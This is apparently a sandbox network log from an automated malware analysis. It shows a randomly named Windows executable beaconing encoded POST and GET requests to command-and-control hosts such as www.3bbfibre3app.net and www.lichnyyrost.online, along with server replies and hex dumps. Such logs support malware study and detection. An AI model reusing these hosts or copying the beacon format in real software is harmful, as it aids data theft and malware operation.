                                                                                                                                                                                                                        CF-RAY: 8d7342ddcdf30cc8-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=95266&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=539&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Raw: 63 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 61 74 20 2f 72 66 75 6f 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 4e 45 2c 4e 4f 41 52 43 48 49 56 45 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 68 74 6d 6c 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 30 3b 20 6d 61 72 67 69 6e 3a 30 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 2a 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 30 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: c9b<!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>Page not found at /rfuo/</title> <meta name="robots" content="NONE,NOARCHIVE"> <style type="text/css"> html * { padding:0; margin:0; } body * { padding:10px 20px; } body * * { padding:0; } body { font:small sans-serif; bac
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.711146116 CEST1289INData Raw: 6b 67 72 6f 75 6e 64 3a 23 65 65 65 3b 20 63 6f 6c 6f 72 3a 23 30 30 30 3b 20 7d 0a 20 20 20 20 62 6f 64 79 3e 64 69 76 20 7b 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 20 7d 0a 20 20 20 20 68 31 20
                                                                                                                                                                                                                        Data Ascii: kground:#eee; color:#000; } body>div { border-bottom:1px solid #ddd; } h1 { font-weight:normal; margin-bottom:.4em; } h1 span { font-size:60%; color:#666; font-weight:normal; } table { border:none; border-collapse: collapse; wi
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.711201906 CEST1289INData Raw: 0a 20 20 20 20 20 20 20 20 3c 74 64 3e 64 6a 61 6e 67 6f 2e 76 69 65 77 73 2e 73 74 61 74 69 63 2e 73 65 72 76 65 3c 2f 74 64 3e 0a 20 20 20 20 20 20 3c 2f 74 72 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0a 20 20 3c 2f 64 69
                                                                                                                                                                                                                        Data Ascii: <td>django.views.static.serve</td> </tr> </table> </div> <div id="info"> <p> Using the URLconf defined in <code>portifolio.urls</code>, Django tried these URL patterns, in this order:
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.711244106 CEST290INData Raw: 20 20 20 3c 2f 70 3e 0a 20 20 20 20 0a 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 3c 64 69 76 20 69 64 3d 22 65 78 70 6c 61 6e 61 74 69 6f 6e 22 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 59 6f 75 e2 80 99 72 65 20 73 65 65 69 6e 67 20 74 68 69 73
                                                                                                                                                                                                                        Data Ascii: </p> </div> <div id="explanation"> <p> Youre seeing this error because you have <code>DEBUG = True</code> in your Django settings file. Change that to <code>False</code>, and Django will display a standard
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.711277008 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        49192.168.11.2049841142.251.40.243805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:40.033432961 CEST817OUTPOST /xb3p/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.3bbfibre3app.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.3bbfibre3app.net
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.3bbfibre3app.net/xb3p/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 7a 46 75 61 5a 57 74 38 66 36 4e 4a 32 77 34 71 69 35 70 35 6d 65 2f 46 44 52 44 76 5a 50 66 55 58 6a 2b 46 64 4e 6b 69 78 63 30 32 32 48 6a 39 69 61 57 39 32 73 75 4e 63 74 46 47 78 6c 34 62 42 4d 52 32 37 6e 72 75 31 51 59 53 48 77 58 38 49 58 72 2f 6c 4e 56 67 4d 68 53 4e 4d 75 59 6f 35 70 67 6b 4a 47 64 59 2b 38 35 66 62 49 6e 46 36 50 67 4b 79 4d 77 34 4b 36 71 4e 69 73 76 2b 39 51 6c 48 75 67 66 4b 57 66 2b 2f 71 2f 62 79 2b 30 73 6c 45 57 46 45 4c 2b 74 64 6b 43 2b 67 77 58 59 4a 36 50 70 38 79 2f 42 4f 72 61 4a 56 75 62 44 6b 45 69 6f 64 65 46 49 33 54 50 51 53 4f 77 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=zFuaZWt8f6NJ2w4qi5p5me/FDRDvZPfUXj+FdNkixc022Hj9iaW92suNctFGxl4bBMR27nru1QYSHwX8IXr/lNVgMhSNMuYo5pgkJGdY+85fbInF6PgKyMw4K6qNisv+9QlHugfKWf+/q/by+0slEWFEL+tdkC+gwXYJ6Pp8y/BOraJVubDkEiodeFI3TPQSOw==
                                                                                                                                                                                                                        Oct 23, 2024 18:56:40.173388958 CEST406INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:40 GMT
                                                                                                                                                                                                                        Location: https://www.3bbfibre3app.net/xb3p/
                                                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        50192.168.11.2049842142.251.40.243805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:42.666627884 CEST837OUTPOST /xb3p/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.3bbfibre3app.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.3bbfibre3app.net
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.3bbfibre3app.net/xb3p/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 7a 46 75 61 5a 57 74 38 66 36 4e 4a 32 52 6f 71 68 59 70 35 32 4f 2f 47 49 78 44 76 51 76 66 59 58 6a 79 46 64 50 4a 2f 78 71 45 32 32 69 48 39 68 62 57 39 33 73 75 4e 58 4e 45 4d 31 6c 34 71 42 4d 74 55 37 6e 6e 75 31 51 4d 53 48 7a 44 38 49 67 58 2b 6d 39 56 75 41 42 53 50 54 65 59 6f 35 70 67 6b 4a 41 78 79 2b 38 78 66 59 35 58 46 37 75 68 34 37 73 77 6e 4e 36 71 4e 30 63 76 36 39 51 6b 53 75 6c 6a 77 57 64 47 2f 71 36 6e 79 2b 6c 73 6d 66 47 46 65 55 75 73 4d 6c 48 47 6f 34 6d 67 47 38 4e 41 75 77 64 68 32 6a 73 45 50 7a 70 33 41 48 78 30 76 61 31 78 66 52 4e 52 4a 54 34 70 45 6d 77 62 31 4f 79 58 6e 65 77 4f 43 7a 58 70 49 45 4c 38 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=zFuaZWt8f6NJ2RoqhYp52O/GIxDvQvfYXjyFdPJ/xqE22iH9hbW93suNXNEM1l4qBMtU7nnu1QMSHzD8IgX+m9VuABSPTeYo5pgkJAxy+8xfY5XF7uh47swnN6qN0cv69QkSuljwWdG/q6ny+lsmfGFeUusMlHGo4mgG8NAuwdh2jsEPzp3AHx0va1xfRNRJT4pEmwb1OyXnewOCzXpIEL8=
                                                                                                                                                                                                                        Oct 23, 2024 18:56:42.823436022 CEST406INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:42 GMT
                                                                                                                                                                                                                        Location: https://www.3bbfibre3app.net/xb3p/
                                                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        51192.168.11.2049843142.251.40.243805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.291646957 CEST5156OUTPOST /xb3p/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.3bbfibre3app.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.3bbfibre3app.net
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.3bbfibre3app.net/xb3p/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 7a 46 75 61 5a 57 74 38 66 36 4e 4a 32 52 6f 71 68 59 70 35 32 4f 2f 47 49 78 44 76 51 76 66 59 58 6a 79 46 64 50 4a 2f 78 70 6b 32 78 55 4c 39 6a 38 43 39 30 73 75 4e 4a 39 45 42 31 6c 34 7a 42 4d 46 51 37 6e 62 68 31 55 38 53 42 6a 66 38 42 78 58 2b 39 74 56 75 64 78 53 4f 4d 75 59 78 35 74 4d 67 4a 41 42 79 2b 38 78 66 59 37 50 46 79 66 68 34 33 4d 77 34 4b 36 71 42 69 73 76 43 39 51 39 6c 75 6b 57 4e 52 73 6d 2f 71 65 37 79 74 6a 59 6d 43 57 46 59 56 75 73 55 6c 48 44 32 34 6c 56 39 38 4f 64 31 77 63 6c 32 68 70 70 6f 6d 4c 33 2f 64 44 45 48 57 78 78 56 47 65 78 70 58 62 39 6b 75 69 50 61 4f 33 62 56 53 78 79 75 76 6e 6c 34 5a 72 4e 2b 56 34 70 73 71 57 48 2b 49 4c 57 41 4a 6c 46 39 77 57 42 76 41 73 31 69 45 4d 2b 72 4c 65 51 56 4a 41 76 64 52 52 56 79 6d 78 45 37 34 56 46 50 34 63 6c 6e 35 4b 74 6e 32 4a 44 65 41 4b 35 4f 66 32 30 35 77 77 54 57 6f 4f 44 75 52 64 78 61 73 73 41 65 35 4d 44 74 62 6f 37 66 79 46 63 77 31 63 6a 78 7a 30 44 73 45 2f 70 44 72 59 72 79 50 77 74 73 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=zFuaZWt8f6NJ2RoqhYp52O/GIxDvQvfYXjyFdPJ/xpk2xUL9j8C90suNJ9EB1l4zBMFQ7nbh1U8SBjf8BxX+9tVudxSOMuYx5tMgJABy+8xfY7PFyfh43Mw4K6qBisvC9Q9lukWNRsm/qe7ytjYmCWFYVusUlHD24lV98Od1wcl2hppomL3/dDEHWxxVGexpXb9kuiPaO3bVSxyuvnl4ZrN+V4psqWH+ILWAJlF9wWBvAs1iEM+rLeQVJAvdRRVymxE74VFP4cln5Ktn2JDeAK5Of205wwTWoODuRdxassAe5MDtbo7fyFcw1cjxz0DsE/pDrYryPwtsBzB+BbUiujXFBsoHx6x/kN0Mh926d6JwBb0WnRR4bDp6S8IIJrSsGo6UsoT8PBsfv4WS0jk2lGOi8eQVCBtwXUqt+aLvkmW70brXDOrJU0uRAD4L9BIeoWCwY4AwaIkoGgORP7my3LVummW7QwUZqWCGz5FC4DWyaT/Iw0zG3zirVqgAKI9jauIT56nUlamk6N91UAnfpLB7V/Xe5IZLAillvMLVP5ebq8o3rXfHUfsoQlz9/Azsf1b6nT+IFz6omZkUZXKO1Ck/qQmxgUCVsQIilf/rNbzwtxp4IF/Tf2nr8zdbL0lC/HRoKf8DI8ZyLNhvgShr3mNxwGxIKJr5iINQzeUdSlSYVK/faSsyi1huWRLeTk60Q1JRWWg8k8bpCD/GYNkCqmwQ2xjXk4TNYde3r6GZQhnq0qUJdiUuXHET+U+HrewgbCfl1s9KygM9yYWK1AubO0dE4rB9lYHx1gt/lyz9SvwsfVvzn+L+G4oXY/1g2UHmsLeS1Dw38LSI3kCPtYR/TIEkrIemGMLaVofjjQiaGA+MNDiytx/6DbLbV6D4PRzcSd6sOrPBnhUfYo/9dAN8GACFHPzc2uF9fDvJVG+lcQpTeZOD3Hpg9X7h1JQvvikdHsucaXewJPHIccj5do5t+qOqvszB70P2d/sAlFxHgtrBBI [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.291729927 CEST2830OUTData Raw: 54 47 30 6d 61 43 38 34 55 33 2f 34 62 46 32 4a 56 34 2f 41 6c 47 69 56 52 39 63 76 4d 46 4f 61 39 71 4d 76 42 53 6d 34 55 36 6d 49 52 4c 50 37 53 7a 69 71 71 76 33 44 76 52 44 31 67 49 51 37 59 47 65 34 64 46 45 5a 74 4d 46 70 34 4e 75 4d 66 6d
                                                                                                                                                                                                                        Data Ascii: TG0maC84U3/4bF2JV4/AlGiVR9cvMFOa9qMvBSm4U6mIRLP7Sziqqv3DvRD1gIQ7YGe4dFEZtMFp4NuMfmUQHBRKg7FOpttjWzfYHhHJkXqZOl6jzLFW9tFwMABfsWOlxwGAOm0g3d1e7O5fnOG8agJ1VjSLyAI7A3Fu+vTgywYRx9DoWq0mnD9E6O/T/JfJGYx8YOCOh+CzIqUzIUKxZrQS4AB52sI7rSWOwaWJWEAHDF0HNDc
                                                                                                                                                                                                                        Oct 23, 2024 18:56:45.463459015 CEST406INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:45 GMT
                                                                                                                                                                                                                        Location: https://www.3bbfibre3app.net/xb3p/
                                                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        52192.168.11.2049844142.251.40.243805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:47.912940979 CEST538OUTGET /xb3p/?2rul-=+HG6aiFxTvlSzQoIs9ZJ3PSkAiypA9aaBhm9bacr778ozHX/qp3/mrPcWfQQ4m8pKd5uzW3Q1BNoTzb8AReS/5N/dAP+OtFAus01fnFx169lP7D5+vQ5ltg=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.3bbfibre3app.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:56:48.032459021 CEST544INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:47 GMT
                                                                                                                                                                                                                        Location: https://www.3bbfibre3app.net/xb3p/?2rul-=+HG6aiFxTvlSzQoIs9ZJ3PSkAiypA9aaBhm9bacr778ozHX/qp3/mrPcWfQQ4m8pKd5uzW3Q1BNoTzb8AReS/5N/dAP+OtFAus01fnFx169lP7D5+vQ5ltg%3D&Hh=g6BlO
                                                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        53192.168.11.2049845194.58.112.174805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:53.938342094 CEST823OUTPOST /3ld1/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.lichnyyrost.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.lichnyyrost.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.lichnyyrost.online/3ld1/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 50 7a 73 4d 6d 4e 45 30 2b 47 6c 2b 5a 59 41 79 46 54 7a 6a 34 5a 47 5a 57 63 35 57 2f 4b 45 37 6e 52 76 4d 56 42 65 30 41 6e 2b 39 4c 76 34 47 44 61 64 59 68 55 39 54 53 45 47 58 51 71 73 6f 33 62 37 59 56 4a 79 77 2f 75 44 6a 49 35 55 6c 4b 57 31 68 70 66 6b 53 72 51 77 57 71 47 48 62 37 4f 6a 55 43 4d 70 41 6e 61 72 58 64 50 56 4f 43 4d 6f 67 36 4f 6e 4d 76 64 4a 39 70 45 6a 69 64 6d 62 53 6f 46 54 58 64 72 66 51 46 32 38 69 30 76 51 76 57 78 36 6d 2b 70 6b 48 55 6b 53 2b 41 2f 78 2f 4c 52 77 71 4a 47 53 73 34 76 4a 31 58 6d 4d 35 32 39 4b 44 74 4b 52 45 4d 48 67 35 76 77 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=PzsMmNE0+Gl+ZYAyFTzj4ZGZWc5W/KE7nRvMVBe0An+9Lv4GDadYhU9TSEGXQqso3b7YVJyw/uDjI5UlKW1hpfkSrQwWqGHb7OjUCMpAnarXdPVOCMog6OnMvdJ9pEjidmbSoFTXdrfQF28i0vQvWx6m+pkHUkS+A/x/LRwqJGSs4vJ1XmM529KDtKREMHg5vw==
                                                                                                                                                                                                                        Oct 23, 2024 18:56:54.191987038 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:54 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        Data Raw: 64 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 77 bb bb 94 4c db 02 12 3b 69 12 c4 88 d1 34 40 81 a0 45 5f 28 fa a9 80 fc 50 a3 f8 a1 fc 85 dd 7f d4 73 ef ec 2e 97 14 29 3f e2 14 15 20 89 9c 9d b9 73 e7 de 73 cf bd 33 b3 cd d3 3d df 8e 27 81 12 83 78 e4 b6 9b f4 57 d8 ae 8c a2 56 c5 89 3a b2 27 83 d8 d9 51 15 e1 4a af df aa 84 e3 0a fa 28 d9 6b 37 47 2a 96 c2 1e c8 30 52 71 ab f2 fe a5 5f 18 e7 f0 8c 5b 3d 39 52 ad 4a 20 c3 a1 e3 f5 2b c2 f6 bd 58 79 e8 14 aa 7e 38 36 42 c8 9c ed b9 e3 a8 dd c0 0f e3 52 d7 5d a7 17 0f 5a 3d b5 e3 d8 ca e0 2f 0d c7 73 62 47 ba 46 64 4b 57 b5 56 21 22 76 62 57 b5 77 77 77 4d d7 b1 07 de 64 12 fa 51 6c fa 9e eb 78 aa 69 e9 a7 4d 7c 19 8a 50 b9 ad 4a 14 4f 5c 15 0d 94 c2 44 23 d5 73 64 ab 22 5d b7 22 06 a1 da 2e d4 65 f5 0c 39 8e 7d d3 8e 22 4c 32 1d ef 60 21 79 ef 6d 09 cd 7c cf c4 9f f5 d5 8a 20 0b c2 60 23 d9 57 d6 15 83 3b b6 9b 91 1d 3a 41 dc b6 ce [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: d1eZko_1fQRERy8G9-E!rwL;i4@E_(Ps.)? ss3='xWV:'QJ(k7G*0Rq_[=9RJ +Xy~86BR]Z=/sbGFdKWV!"vbWwwwMdQlxiM|PJO\D#sd"]".e9}"L2`!ym| `#W;:A4OoyKoN:^5P/{%;W_[;ejV&$&8toUUm3\0vR~g@Em~PYg'hiv$v+u}~tbd,;w:9g9;KJoQr<w~>K|nOx(Xk"uvBmAB`+<PE.~eJG%Mh7WNn(B3w8;Nb4bDuF6?iuj9L1Xm7{Jjvvr@L~`>8ECh?vl:@HYvx$"q;#vY@Jb_`:?m vMrbK1yzH:SR^w<kQe(}lK:}X^i'/5;@&GgMt) @zp78;MSjA'"1yHgU!"]Urb)e6uknxwA [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:56:54.192075968 CEST1289INData Raw: 30 c3 b5 f3 e1 ab 8d 13 8d bb da e5 85 26 5d 1f ac 37 42 c6 f4 14 e4 fe 19 79 f0 7e fa 7b 84 c8 e3 f4 cb e4 7b 51 10 ec 9d f4 4b 9d 30 a9 b9 69 81 44 33 3c 73 fe 1a 17 a5 6e 89 20 b6 95 8c c7 a1 d2 a5 df 74 75 39 f7 74 f2 e7 86 03 3f 92 dd 97 98
                                                                                                                                                                                                                        Data Ascii: 0&]7By~{{QK0iD3<sn tu9t?d;,6Io-^`2dPH?|XY,,xHuC+/&\oGz<0]\jds9iN?"f2(-8a{}s7'O
                                                                                                                                                                                                                        Oct 23, 2024 18:56:54.192118883 CEST966INData Raw: d7 5d b7 26 aa b2 2a ea b3 b3 91 16 db 7e 08 7d 49 86 83 f1 2f ad e1 5f 53 8b 33 5d e5 f5 e3 01 5a ce 9e 5d a4 3f 8d 66 05 79 f2 4d 0c dc 32 e9 32 cb a4 73 f5 2b ef 6d d7 aa eb d5 ba 68 43 e8 42 b5 69 38 fd cc 8d 86 12 f3 2d 67 45 75 a5 7a 5c 73
                                                                                                                                                                                                                        Data Ascii: ]&*~}I/_S3]Z]?fyM22s+mhCBi8-gEuz\s'3/keg>v/<Kvs"P-.J6&zcrIUiJj&0o)}0!gO:YqyGZzv#L


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        54192.168.11.2049846194.58.112.174805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:56.723536968 CEST843OUTPOST /3ld1/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.lichnyyrost.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.lichnyyrost.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.lichnyyrost.online/3ld1/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
